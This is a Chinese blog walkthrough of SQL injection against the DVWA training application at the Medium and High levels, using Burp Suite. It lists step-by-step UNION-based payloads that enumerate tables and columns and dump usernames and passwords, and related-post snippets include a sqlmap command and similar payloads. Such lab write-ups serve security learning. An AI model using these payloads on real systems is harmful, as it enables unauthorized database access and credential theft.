SQL注入(Medium级别 和high)

最新推荐文章于 2024-04-24 22:12:07 发布
最新推荐文章于 2024-04-24 22:12:07 发布
阅读量981 收藏 7
点赞数 3
文章标签: sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64066158/article/details/124434422
版权

和前天的low级别注入一样,我们可以先打开源码进行理解和分析

可以看出加入了特殊函数来过滤特殊字符,且变量的单引号不见了,可以分析出有可能为数字型注入;

打开dvwa,可以看到无法输入sql语句进行注入;这时我们要用到Burp suite进行拦截包和sql注入;从而得到我们想要的数据,

此时打开burp suite ,进行拦截并且send to repeater,用repeater进行sql注入和运行 ;

打开repeater 可以看出运行界面和运行界面的源代码(源代码在raw中,我们为了更直观的看见输出结果一般直接利用Render)

继续按照前天的思路;

(1)先分析是字符型还是数字型注入

往id=1后加 ' 并运行

可以看出Medium级别把单引号已经过滤,可以得出结论字符型注入是不可行的

再次尝试数字型:

往id=1后加 and 1=1 and1=2 并分别运行

 

1=1运行成功;1=2运行失败,可以得出结论为数字型注入;

这时我们开始进行SQL注入;语句和前天的语法一样,只是少了单引号;下面开始进行演示;

(一)猜解sql语句中的字段数

往id后加入1 order by 1 #   

1 order by  2 #

1 order by 3  #

分别运行

可以得出数据库具有两列;

(二)确定显示位置

往id后插入1 union select 1,2 #

(三)获取当前数据库

插入1 union select 1,database () #

得出库名dvwa

(四)获取数据库中的表

 插入1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

(五)找出我们感兴趣的表并获得字段名

插入1  union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

 

 

这时候我们发现运行错误因为'users'为字符型 无法在数字型里边进行注入;所以我们要利用一个转换工具(我用的小葵转换字典,可以自行下载,如果遇到问题可以私信我我发给你)把users转换成数字型,利用转换后的数字进行注入

(六)找出你感兴趣的字段名进行下载

插入1 union select user,password from users #

 现在我们得到了想要的用户名和密码;

high级别

 首先我们将dvwa设置为high级别并打开源代码进行分析和理解

我们可以分析得出这个high级别有可能为字符型,且无过滤语句,

现在打开SQL injection

可以发现输入界面和响应界面没有在一个页面;这是为了防止攻击者用工具进行SQL注入;一般工具会进行页面的分析,工具会发送请求然后得到应答请求,再进行请求,应答页面和请求页面为两个页面就导致工具无法在此页面得到请求应答,从而防止工具进行SQL注入。但是我们仍然可以进行手工注入;

 high级别之后的做法和low级别是一样的,只是应答页面和请求页面不在一个页面而已;

在这里就不做简单演示了  流程和做法和low级别一模一样(可参考前天的博客)

 

 

 

 

 

 

 

 

Eon.850
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2019-2-26 dvwa学习(3)--sql注入级别high和session
weixin_42555985的博客
02-26 3279
2019-2-26 dvwa学习(3)–sql注入级别high 继续把dvwa环境安全级别调整为high 观察界面 high级别页面,点击"here to change your ID",会打开另外一个网页(session-input.php),然后输入3,提交,在主页面上会显示数据。 我们打开session-input.php的开发者工具,获取cookie 现在尝试按照前面的方式攻击,pos...
软件安全实验2 SQL注入实验
最新发布
06-19
1、借助Web漏洞教学和演练的开源免费工具DVWA,学习了解Web漏洞的原理及利用。 2、 DVWA(Damn Vulnerable Web Application)是一款用PHP+MySQL编写的...DVWA将代码分为4种安全级别:Low、MediumHigh、Impossible。
SQL Server应用程序的高级SQL注入
weixin_34360651的博客
07-21 157
 创建时间:2004-06-10文章属性:翻译文章提交:panderlang (pander_lang_at_hotmail.com)SQL Server应用程序的高级SQL注入作者:Chris Anley[chris@ngssoftware.com]An NGSSoftware Insight Security Research(NISR) Publication翻译:青野志狼(panderl...
字符串型漏洞注入
Pythonit教程网
04-24 1040
SQL注入是一种严重的安全漏洞,它允许攻击者在不受控制的情况下执行任意的SQL代码。字符串型注入是SQL注入的一种形式,它涉及到在应用程序的输入框插入恶意的字符串,以干扰正常的SQL查询执行。此外,可以通过搭建安全测试环境来实践SQL注入的防御技术,以加深对这一安全漏洞的认识。输入验证和清理:对用户输入进行严格的验证和清理,确保只接受符合预期格式和长度的输入。SQL注入的基本原理是攻击者通过构造特定的输入,使得原本的SQL查询语句结构发生改变,从而执行攻击者指定的恶意SQL代码。
9.sql injection之级注入(Medium)-------小白笔记
qwsn
11-03 1948
讲在前面: 1.判断注入点,基于DVWA平台的Medium等级SQL注入 2.Medium等级在Low等级的基础上,接了一个函数,mysqli_real_escape_string() //注意:该函数是用来转义字符的,起到了过滤的作用 注入过程: 1.使用burpsuite拦截,抓包 //由于,输入框被取消了,只能选择1234等数字,为了注入语句,我们拦截包,抓取到包后,注入语句即可 ...
dvwa靶场(Medium)安全等级sql注入
白帽小学二年级的博客
12-16 1398
sql注入教程详解 使用burpsuite将抓到的数据包转发到repeater模块 (burpsuite使用前需要将浏览器设置代理 判断是int还是str类型,显然是int类型 用order by关键字进行数据表列数的判断 1 order by 1,2 //正常显示 1 order by 1,2,3 //报错,所以是两列 1 and 1=2 union select 1,database() //联合注入获取数据库名 1 a...
DVWA sql注入-MEDIUM
m0_46616663的博客
05-25 519
1.判断是否存在sql注入漏洞 可以看到不是get型数据提交方式了,查询数据也变成了下拉表单的方式。 burpsuite抓包吧那就 常规判断有无注入及其类型 推测有转义符转义 为数字型注入 数据库字段为2 获取数据库信息 1'union select version(),@@version_compile_os# 查询用户名和数据库名 1 union select database(),user()# 爆表...
dvwa靶场训练.rar
03-17
DVWA分为多个安全级别,包括"Low"、"Medium"、"High"和"Impossible",每个级别下都有不同的漏洞类型,如SQL注入、XSS(跨站脚本)、CSRF(跨站请求伪造)等。这些漏洞在现实世界非常常见,掌握它们的识别和利用...
dvwa官方版
09-22
- DVWA包含多个安全级别:Low、MediumHigh、 Impossible,用户可以根据自身技术水平选择合适的难度进行练习。 - 漏洞类型多样,包括但不限于SQL注入、XSS(跨站脚本)、文件包含、命令注入、CSRF(跨站请求伪造...
DVWA-master.zip
06-21
6. **安全级别设置**:DVWA有多个安全级别,包括"Low"、"Medium"、"High"和"Impossible",你可以根据学习需求调整。 通过实践DVWA靶场,不仅可以学习到各种Web安全漏洞的原理,还能提高漏洞发现和防御的能力。同时...
DVWA 之medium级别sql注入
weixin_30325071的博客
07-13 455
级注入的提交方式从get请求改为post请求,可以用burp抓包注入或抓注入点 1 .判断是否有注入 sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data ...
高级sql注入
QWE34534的博客
10-04 232
1. 避开输入过滤 输入过滤存在于外部和内部,外部属于web应用防火墙WAF,入侵防御系统IPS,入侵检测系统IDS,内部属于代码对输入进行过滤 过滤select,insert等sql关键字和' |,等字符 (1)大小写变种:将关键字变为SeLeCt * FrOm UserINFO 由于过滤是针对全大写或者全小写,很少会对大小写做排列组合进行过滤。若单个过滤则会影响用户正常输入。 ...
sql high level
weixin_30443075的博客
12-05 40
1,create like: use a table to create another same table .ex: CREATE TABLE IF NOT EXISTS tb_test4 LIKE tb_test3; 2,event: CREATE EVENT event_test ON SCHEDULE EVERY 1 SECONDDO INSERT INTO tb_test_e (u...
SQL Injection_medium
qq_45434762的博客
12-04 262
1.打开网页进行数据提交发现是POST方式,后面就使用Hackbar进行提交数据 2.使用and 1=1进行判断,发现我们提交的SQL语句被带入数据库执行,说明存在注入点 3.判断列数 使用order by对数据库钟表的列数进行判断,经过测试后可以看出表钟有两列数据 4.判断显示位 是哦那个union select进行判断,我们可以看出1,2都有显示 ...
DVWA sql注入Medium
gclome的博客
07-05 3075
上节虽然写了low,可是发现自己对判断是否有注入点还有判断是字符型注入或数字型注入还是不太清楚,于是又找了一个讲解: https://www.cnblogs.com/qq3285862072/p/9439573.html 现在开始做mediumSQL注入 由于上面不方便直接输入,于是用burpsuite进行拦截然后修改 1.改成1'改成1 and 1=1 改成1 and 1=2 则可以判断为数字...
DVWA 之SQL注入LOW与Medium
ANDTM的博客
04-10 784
这里我们重点看前几行代码,大概意思就是当我们呈递的东西不为空是,就会把我们呈递的东西赋值给id(代码蓝色的),此时右边的id(代码红色的,即加引号的)就是我们输入的东西,没有任何的过滤机制。而在数据库执行时,如select email from member where id=$id,其 $id 为 我们输入的值 ,如果 输入 1 or 1=1 ,则变成select email from member where id=1 or 1=1 ,SQL注入大概就是这个原理。
LeetCode sql语句 学习专题【Medium
u011439455的博客
08-07 407
题目链接如下: https://leetcode.com/problemset/database/ 目录 626. Exchange Seats 178. Rank Scores 180. Consecutive Numbers 184. Department Highest Salary 177. Nth Highest Salary 626. Exchange Seats ...
DVWA下的SQL注入
NWC2017的博客
07-25 1248
DVWA下的SQL注入
渗透测试实验_基于DVWA的SQL盲注 安全等级Low Medium High
weixin_47133613的博客
03-20 5619
文章目录SQL盲注1. SQL盲注概述2. 基于布尔值的盲注3. 前期实验准备4. Low等级5. Medium等级6. High等级 SQL盲注 1. SQL盲注概述 以下内容引用自《SQL盲注(原理概述、分类)》 盲注: 即在SQL注入过程SQL语句执行查询后,查询数据不能回显到前端页面,我们需要使用一些特殊的方式来判断或尝试,这个过程成为盲注 如果数据库运行返回结果时只反馈对错不会返回数据库的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 盲注是不能通过直接显示的途径来获取数
burpsuite sql注入 medium
05-24
Burp Suite是一款常用的Web应用程序渗透测试工具,可以帮助安全测试人员发现应用程序存在的漏洞,比如SQL...需要注意的是,在进行SQL注入漏洞测试时,一定要遵循法律和道德规范,不得未经授权测试非自己拥有的网站。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值